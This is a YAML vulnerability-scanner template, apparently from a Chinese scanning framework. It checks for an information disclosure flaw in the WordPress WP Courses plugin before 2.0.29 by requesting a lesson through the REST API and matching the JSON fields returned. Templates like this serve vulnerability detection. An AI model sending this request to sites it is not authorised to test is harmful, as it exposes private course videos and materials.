product: WordPress
vName: WordPress WP Courses Plugin Information Disclosure
type: 信息泄露
vID: [ ]
level: 3
vDesc: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-json/wp/v2/lesson/1
    verify:
      logic: and
      check:
        - regex:
            value:
              - rest_post_invalid_id
              - '"(guid|title|content|excerpt)":{"rendered":'
            logic: or
        - header:
            value:
              - application/json
            logic: and
        - status: 200
